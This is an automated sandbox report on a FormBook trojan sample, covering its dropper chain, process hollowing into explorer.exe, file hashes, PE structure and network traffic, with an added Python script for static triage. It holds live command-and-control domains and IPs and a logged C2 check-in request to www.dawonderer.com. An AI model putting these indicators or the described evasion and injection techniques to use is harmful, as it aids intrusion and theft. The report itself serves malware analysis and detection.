Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 113 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 635291 | Sample: skyrunyyu655432.exe | Start date: 27/05/2022 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures

skyrunyyu655432.exe (started)
    dropped: C:\Users\user\AppData\...\jfotlqeoqb.exe, PE32
    jfotlqeoqb.exe (started)
        signatures: Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
        jfotlqeoqb.exe (started, second instance)
            signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            explorer.exe (injected)
                DNS/IP: dawonderer.com 66.235.200.147, ports 49755, 80, CLOUDFLARENETUS, United States; www.dawonderer.com; 3 other IPs or domains
                signatures: System process connects to network (likely due to code injection or exploit); Uses ipconfig to lookup or modify the Windows network settings
                ipconfig.exe (started)
                    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    cmd.exe (started)
                        conhost.exe (started)

Source | Detection | Scanner | Label
skyrunyyu655432.exe | 42% | Virustotal |
skyrunyyu655432.exe | 34% | ReversingLabs | Win32.Trojan.FormBook

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe | 37% | ReversingLabs | Win32.Trojan.FormBook

Source | Detection | Scanner | Label
2.2.jfotlqeoqb.exe.1660000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.0.jfotlqeoqb.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.0.jfotlqeoqb.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.2.jfotlqeoqb.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.0.jfotlqeoqb.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

No Antivirus matches

Source | Detection | Scanner | Label
www.boxberry-my.com/sn31/ | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com | 52.71.57.184 | true | false | | high
dawonderer.com | 66.235.200.147 | true | true | | unknown
www.dawonderer.com | unknown | unknown | true | | unknown
www.bolacorner.com | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
www.boxberry-my.com/sn31/ | true | Avira URL Cloud: malware | low

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.hugedomains.com/domain_profile.cfm?d=bolacorner.com | ipconfig.exe, 0000000D.00000002.547196966.00000000035CF000.00000004.10000000.00040000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
52.71.57.184 | hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
66.235.200.147 | dawonderer.com | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 635291
Start date and time: 27/05/2022 18:34:01 (2022-05-27 18:34:01 +02:00)
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 52s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: skyrunyyu655432.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@9/4@2/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 58.7% (good quality ratio 53.8%)
• Quality average: 73.1%
• Quality standard deviation: 31.5%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
                    No simulations
                    No context
                    Process:C:\Users\user\Desktop\skyrunyyu655432.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):189439
                    Entropy (8bit):7.990724029974516
                    Encrypted:true
                    SSDEEP:3072:df6pBR3Wqc50keMwga+5HZsjYyOWdWRtFgR/r5OKOgYRsh:dCIqG0HM6aHZszOWdaFw/r59Ojsh
                    MD5:83D312E5E420E4BD50B6C4439A68C9DF
                    SHA1:19EC197E9059CF609F9C8279974A8C114C0F1DE9
                    SHA-256:9749AACEAF7D57AA02FFE602524DAE4BF33B9A2D4EE5E814AC668A5D145E128E
                    SHA-512:0101859052ADBB1E10DF3F57E627160C8AB325FD5C199D3F7D3568EE7F18CA3F1F013C793D9BBFEDB87183B670855069048CFAE1930562DDD40ACF021B853F78
                    Malicious:false
                    Reputation:low
                    Preview:.p..*...&....N.SNd(....b..o.f.1/U.5.r...VT.G9C....0V.d\...h.Eq......ih.d..gk..v6...4<.@....M.H...|.S.A..\....0 ...4...C.RH.0F.C..,.)y...pm.....+...C\E..w.q..*kf..i.5...ml.....G(.x[..W..k...S..Z...M..ua...p.|.....p9.kGOK73.._..'.............3%........e..J...k.._.ku.....NUU...r..VT.G9n....0VE.d\...h.Eq...........$...7pw0$....P..ko.6...".."..[[_....zb........RH.0F.........=7!3........X>(.kE.....$*../...:...+.6L....G(.x.......6.^.W.......M..ua.$...X.....B.kGOK73...w....C....x...3m.......&e..J...k.._.ku.....1/U.5.r...VT.G9C....0V.d\...h.Eq...........$...7pw0$....P..ko.6...".."..[[_....zb........RH.0F.........=7!3........X>(.kE.....$*../...:...+.6L....G(.x[..W.....^oW...v...M..ua.$...X.....9.kGOK73...w....C....x...3m.......&e..J...k.._.ku.....1/U.5.r...VT.G9C....0V.d\...h.Eq...........$...7pw0$....P..ko.6...".."..[[_....zb........RH.0F.........=7!3........X>(.kE.....$*../...:...+.6L....G(.x[..W.....^oW...v...M..ua.$...X.....9.kGOK73.
                    Process:C:\Users\user\Desktop\skyrunyyu655432.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):134144
                    Entropy (8bit):6.4123316660425616
                    Encrypted:false
                    SSDEEP:1536:RcTOG+x8+YaGDARvmJVBqNvnlajcCOO0LdXU8JiA1Oy9f6zqjzswa+98qSIJnXSe:5fbnR6BqNvncvhwiz2swteq4iG5sCq
MD5:E85BB68B7CBEFADF0D1ACD4B7B8BD528 (same hash as the process image C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe started as Target ID 2 and 3 below)
                    SHA1:6260AB4FE9793DE221C38E2785EE011178492891
                    SHA-256:D4286A555EF8679CFCB40ADE56C210469C749EC48718E84FBFEA3B472825518B
                    SHA-512:5011822C9BDF7F64E2AD2921D1AD15722AA2C6109BC5FB1C5115928D8057949FFCECD79E408A8731E9B4527795494E367DA7B70112360EA529F1BAD107175310
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 37%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(.}c{.}c{.}c{./.{.}c{./.{.}c{./.{.}c{(.bz.}c{.}b{.}c{y.gz.}c{y..{.}c{y.az.}c{Rich.}c{........................PE..L...s..b..........................................@..........................`............@..........................................@.......................P..........T...............................@............................................text...5........................... ..`.rdata..>N.......P..................@..@.data....1..........................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\skyrunyyu655432.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):334550
                    Entropy (8bit):7.528668807103741
                    Encrypted:false
                    SSDEEP:6144:w/CIqG0HM6aHZszOWdaFw/r59OjsepvncWHsSGw:xNza5gzuoIcWHsS
                    MD5:BDB87446E9230A4B38ACB065FD1A9368
                    SHA1:99B36BFF00A3DC4D17E232E6D5EAFC56D387104A
                    SHA-256:23140E1941470A9F0A5A2866DE11B9F406AA4C2A2CC1FED10DE02A2FE8992F77
                    SHA-512:6EB8D2605E7CE5EF6A3CECE02FFBA33C863C74B2384F38B476EFF1B91F7E41658CD8BAC862D46117823443B562296A7685894ED717DC87D4C8439C90F0BE8946
                    Malicious:false
                    Reputation:low
                    Preview:I.......,...................H...................I...........................................................................................................................................................................................................................................B...................j...............................................................................................................................].......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\skyrunyyu655432.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4734
                    Entropy (8bit):6.200882416738238
                    Encrypted:false
                    SSDEEP:96:JATyzXT6CUhIueeyfioCBRFAfgbMRE5jBL8q5y55m0Y:JATy3VveoBoFAfgb6wFqk
                    MD5:15004B2E0FE7FC55E5E6FBFACF737244
                    SHA1:509F67F7A859512E9964D9AA9EC38329AF4C2B6A
                    SHA-256:24051CD359262971B696AD209D9A66C43221A389C56B7324B7FA4D2DF7DB5C00
                    SHA-512:71BF196170FFDE6C22E0E39759891709B7947D5332BE5E5EDEFD97B2AFA1CA301FEEFBC9BFBE817FC6EF1726BBB0DF97B66B3075C08093825823841546C0014F
                    Malicious:false
                    Preview:....................L~...l..L~...d..t.E.................t.d......T..`........t.d......\..h........t.dS.....D..P........t.d@.....L..X......z..qL...+..l......d..[..d.....d....C.Rz..u...d....B..........z.d......8.Q1....T..\..D...L...l..d.........u............T............d....E.8.9.....8.Q...........[B........L~...t................C..C...t.............t..[B...^.dr...d..B...~.m.d..d..B....!.d...d...B........L~...dE.t......T....t.....^.........t...t..d....L....+z..q[...T..`..d+z..Cc...T..`z.z..qL...T..~.m.dQ....dR........d...d................E.........[B.........L~...dE.t......L....t.....^.........t...t..d+....L........+z..q[...L..X..+z..Cc...L..X..+z..Sc..L..X...[z..qR...L..X..d+z..Cc...L..Xz.z..qL...L..^.db....d..............d...................d................E.........[B.......E.t...........t.....^.........t...t..d"....L....+z..q[......d..+z..Cc......dz.z..qL.......!.d?....d0...........d5..
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Entropy (8bit):7.939796551575706
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 92.16%
                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:skyrunyyu655432.exe
                    File size:278102
                    MD5:070a940ccbc84f85a8ba749eccf55618
                    SHA1:b6624708fa177d6a591c01ba291d40390bb6d8e7
                    SHA256:a734d235386d77a1c6a88bdf63efce5134a82a90e113be647200401b717b891e
                    SHA512:5bcd64f98431c61774901e6fd0dca10e39634ba52b122d4362df8f335ba30f70e6ccf04dacef9af2af1b1a5351d2d27b279ce87c1a92783478c2534502ea69cb
                    SSDEEP:6144:B0Ykc3Mje3wl1Xv3pXF0E3/eIZpg63Zb73lUWeboQXJKAw2mttww:0Gyzl1/3HeItJVUWulQAw2rw
                    TLSH:504412D337E2C1EBD4070A315F7665B2F371A268932B52C70BA05F2A6F711CAD912296
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........qJ...$...$...$./.{...$...%.;.$.".y...$..3....$.f."...$.Rich..$.........................PE..L.....iF.................Z.........
                    Icon Hash:b2a88c96b2ca6a72
                    Entrypoint:0x4032fa
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    DLL Characteristics:
Time Stamp:0x4669CEB6 [Fri Jun 8 21:48:38 2007 UTC] (link time of the NSIS installer stub the sample was built from, not of the sample's own packaging; NSIS stubs carry a fixed timestamp)
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:55f3dfd13c0557d3e32bcbc604441dd3
                    Instruction
                    sub esp, 00000180h
                    push ebx
                    push ebp
                    push esi
                    xor ebx, ebx
                    push edi
                    mov dword ptr [esp+18h], ebx
                    mov dword ptr [esp+10h], 00409170h
                    xor esi, esi
                    mov byte ptr [esp+14h], 00000020h
                    call dword ptr [00407030h]
                    push ebx
                    call dword ptr [00407278h]
                    mov dword ptr [00423FD4h], eax
                    push ebx
                    lea eax, dword ptr [esp+34h]
                    push 00000160h
                    push eax
                    push ebx
                    push 0041F4E8h
                    call dword ptr [00407154h]
                    push 0040922Ch
                    push 00423720h
                    call 00007F3D90DA7A58h
                    call dword ptr [004070B4h]
                    mov edi, 00429000h
                    push eax
                    push edi
                    call 00007F3D90DA7A46h
                    push ebx
                    call dword ptr [00407108h]
                    cmp byte ptr [00429000h], 00000022h
                    mov dword ptr [00423F20h], eax
                    mov eax, edi
                    jne 00007F3D90DA52BCh
                    mov byte ptr [esp+14h], 00000022h
                    mov eax, 00429001h
                    push dword ptr [esp+14h]
                    push eax
                    call 00007F3D90DA7539h
                    push eax
                    call dword ptr [00407218h]
                    mov dword ptr [esp+1Ch], eax
                    jmp 00007F3D90DA5315h
                    cmp cl, 00000020h
                    jne 00007F3D90DA52B8h
                    inc eax
                    cmp byte ptr [eax], 00000020h
                    je 00007F3D90DA52ACh
                    cmp byte ptr [eax], 00000022h
                    mov byte ptr [esp+14h], 00000020h
                    jne 00007F3D90DA52B8h
                    inc eax
                    mov byte ptr [esp+14h], 00000022h
                    cmp byte ptr [eax], 0000002Fh
                    jne 00007F3D90DA52E5h
                    inc eax
                    cmp byte ptr [eax], 00000053h
                    jne 00007F3D90DA52C0h
                    Programming Language:
                    • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a0 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x900 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x288 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x59ac | 0x5a00 | False | 0.668142361111 | data | 6.45807821776 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x117a | 0x1200 | False | 0.4453125 | data | 5.17513527374 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1afd8 | 0x400 | False | 0.6015625 | data | 4.98110806401 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2c000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94448786242 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
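The section table, file size and entropy above are enough for a first static triage before the sample is run. The following Python is an added example and not part of the Joe Sandbox report: it encodes the report's own section rows, entrypoint and file summary as constructed input and derives the findings an analyst would read off them (entrypoint inside .text, no writable-and-executable section, the NSIS .ndata marker, a .data section that is mostly filled at run time, and a large high-entropy overlay that no section covers). The report does not give PointerToRawData, so the overlay size is an estimate; HEADER_BYTES = 0x400 is an assumption about the header size.

```python
from dataclasses import dataclass
from typing import FrozenSet, List, Optional, Tuple


@dataclass(frozen=True)
class Section:
    name: str
    vaddr: int        # RVA of the section
    vsize: int        # VirtualSize
    rawsize: int      # SizeOfRawData
    entropy: float    # 8-bit entropy of the raw bytes
    chars: FrozenSet[str]


# Constructed from the report's section table, file summary and entrypoint for skyrunyyu655432.exe.
SECTIONS: List[Section] = [
    Section(".text",  0x1000,  0x59ac,  0x5a00, 6.458, frozenset({"EXECUTE", "CODE", "READ"})),
    Section(".rdata", 0x7000,  0x117a,  0x1200, 5.175, frozenset({"INITIALIZED_DATA", "READ"})),
    Section(".data",  0x9000,  0x1afd8, 0x400,  4.981, frozenset({"INITIALIZED_DATA", "WRITE", "READ"})),
    Section(".ndata", 0x24000, 0x8000,  0x0,    0.0,   frozenset({"UNINITIALIZED_DATA", "WRITE", "READ"})),
    Section(".rsrc",  0x2c000, 0x900,   0xa00,  3.944, frozenset({"INITIALIZED_DATA", "READ"})),
]
FILE_SIZE, FILE_ENTROPY = 278102, 7.9398
IMAGEBASE, ENTRYPOINT = 0x400000, 0x4032fa
HEADER_BYTES = 0x400  # assumption: DOS/PE/section headers fit in the first 0x400 bytes (0x200 file alignment)

Finding = Tuple[str, object]


def section_of(sections: List[Section], rva: int) -> Optional[Section]:
    """Section containing an RVA, using the larger of virtual/raw size as the extent."""
    for s in sections:
        if s.vaddr <= rva < s.vaddr + max(s.vsize, s.rawsize):
            return s
    return None


def overlay_size(sections: List[Section], file_size: int, header_bytes: int = HEADER_BYTES) -> int:
    """Bytes appended after the last section. Without PointerToRawData this is
    file size minus headers minus the raw sizes, i.e. an estimate good to the header size."""
    return file_size - header_bytes - sum(s.rawsize for s in sections)


def triage(sections, file_size, file_entropy, imagebase, entrypoint) -> List[Finding]:
    findings: List[Finding] = []
    ep = section_of(sections, entrypoint - imagebase)
    if ep is None or "EXECUTE" not in ep.chars:
        findings.append(("EP_OUTSIDE_CODE", entrypoint))
    else:
        findings.append(("EP_IN_CODE", ep.name))
    for s in sections:
        if {"EXECUTE", "WRITE"} <= s.chars:
            findings.append(("WX", s.name))                   # self-modifying or unpacking stub
        if s.entropy >= 7.0:
            findings.append(("HIGH_ENTROPY", s.name))         # packed/encrypted section body
        if s.rawsize and s.vsize / s.rawsize >= 8:
            findings.append(("VSIZE_GT_RAW", s.name))         # mostly filled at run time
    if any(s.name == ".ndata" and s.rawsize == 0 for s in sections):
        findings.append(("NSIS", ".ndata"))                   # NSIS stubs reserve their heap as .ndata
    ov = overlay_size(sections, file_size)
    if ov > 0 and file_entropy > max(s.entropy for s in sections) + 1.0:
        findings.append(("OVERLAY", ov))                      # payload is appended, not in any section
    return findings


if __name__ == "__main__":
    for code, detail in triage(SECTIONS, FILE_SIZE, FILE_ENTROPY, IMAGEBASE, ENTRYPOINT):
        print(f"{code:16} {detail}")
```

The OVERLAY finding is the one that matters for this sample: the whole-file entropy of 7.94 against a best section entropy of 6.46 says the compressed NSIS archive (and with it the FormBook loader) sits after the last section, where section-only scanners and hashes will not see it.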
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x2c710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, CreateFileA, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, CloseHandle, ExitProcess, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/27/22-18:36:55.446707 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49755 | 80 | 192.168.2.3 | 66.235.200.147
05/27/22-18:36:55.446707 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49755 | 80 | 192.168.2.3 | 66.235.200.147
05/27/22-18:36:55.446707 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49755 | 80 | 192.168.2.3 | 66.235.200.147
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2022 18:36:55.291124105 CEST | 49755 | 80 | 192.168.2.3 | 66.235.200.147
May 27, 2022 18:36:55.308113098 CEST | 80 | 49755 | 66.235.200.147 | 192.168.2.3
May 27, 2022 18:36:55.308240891 CEST | 49755 | 80 | 192.168.2.3 | 66.235.200.147
May 27, 2022 18:36:55.446707010 CEST | 49755 | 80 | 192.168.2.3 | 66.235.200.147
May 27, 2022 18:36:55.463802099 CEST | 80 | 49755 | 66.235.200.147 | 192.168.2.3
May 27, 2022 18:36:55.949002028 CEST | 49755 | 80 | 192.168.2.3 | 66.235.200.147
May 27, 2022 18:36:55.968122005 CEST | 80 | 49755 | 66.235.200.147 | 192.168.2.3
May 27, 2022 18:36:55.968209028 CEST | 49755 | 80 | 192.168.2.3 | 66.235.200.147
May 27, 2022 18:37:16.683904886 CEST | 49762 | 80 | 192.168.2.3 | 52.71.57.184
May 27, 2022 18:37:16.821118116 CEST | 80 | 49762 | 52.71.57.184 | 192.168.2.3
May 27, 2022 18:37:16.821217060 CEST | 49762 | 80 | 192.168.2.3 | 52.71.57.184
May 27, 2022 18:37:16.821484089 CEST | 49762 | 80 | 192.168.2.3 | 52.71.57.184
May 27, 2022 18:37:16.958137035 CEST | 80 | 49762 | 52.71.57.184 | 192.168.2.3
May 27, 2022 18:37:16.958177090 CEST | 80 | 49762 | 52.71.57.184 | 192.168.2.3
May 27, 2022 18:37:16.958417892 CEST | 49762 | 80 | 192.168.2.3 | 52.71.57.184
May 27, 2022 18:37:16.958487034 CEST | 49762 | 80 | 192.168.2.3 | 52.71.57.184
May 27, 2022 18:37:17.094350100 CEST | 80 | 49762 | 52.71.57.184 | 192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2022 18:36:54.274760008 CEST | 49873 | 53 | 192.168.2.3 | 8.8.8.8
May 27, 2022 18:36:54.414109945 CEST | 53 | 49873 | 8.8.8.8 | 192.168.2.3
May 27, 2022 18:37:16.569818974 CEST | 65266 | 53 | 192.168.2.3 | 8.8.8.8
May 27, 2022 18:37:16.679555893 CEST | 53 | 65266 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 27, 2022 18:36:54.274760008 CEST | 192.168.2.3 | 8.8.8.8 | 0x62ef | Standard query (0) | www.dawonderer.com | A (IP address) | IN (0x0001)
May 27, 2022 18:37:16.569818974 CEST | 192.168.2.3 | 8.8.8.8 | 0x79c2 | Standard query (0) | www.bolacorner.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName / Address | Type | Class
May 27, 2022 18:36:54.414109945 CEST | 8.8.8.8 | 192.168.2.3 | 0x62ef | No error (0) | www.dawonderer.com | dawonderer.com | CNAME (Canonical name) | IN (0x0001)
May 27, 2022 18:36:54.414109945 CEST | 8.8.8.8 | 192.168.2.3 | 0x62ef | No error (0) | dawonderer.com | 66.235.200.147 | A (IP address) | IN (0x0001)
May 27, 2022 18:37:16.679555893 CEST | 8.8.8.8 | 192.168.2.3 | 0x79c2 | No error (0) | www.bolacorner.com | traff-1.hugedomains.com | CNAME (Canonical name) | IN (0x0001)
May 27, 2022 18:37:16.679555893 CEST | 8.8.8.8 | 192.168.2.3 | 0x79c2 | No error (0) | traff-1.hugedomains.com | hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com | CNAME (Canonical name) | IN (0x0001)
May 27, 2022 18:37:16.679555893 CEST | 8.8.8.8 | 192.168.2.3 | 0x79c2 | No error (0) | hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com | 52.71.57.184 | A (IP address) | IN (0x0001)
May 27, 2022 18:37:16.679555893 CEST | 8.8.8.8 | 192.168.2.3 | 0x79c2 | No error (0) | hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com | 54.209.32.212 | A (IP address) | IN (0x0001)
                    • www.dawonderer.com
                    • www.bolacorner.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49755 | 66.235.200.147 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 27, 2022 18:36:55.446707010 CEST | 1233 | OUT | GET /sn31/?m6R01xM0=qZl/JLX84vnD5ytzVzk0/a0Hcpketn5qZPO1CaBkWF6tW2qs6ow5h/A/zRQwl5G72f7o&nPqD=gvLpMpxpWl HTTP/1.1
Host: www.dawonderer.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii: (seven NUL bytes)

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49762 | 52.71.57.184 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
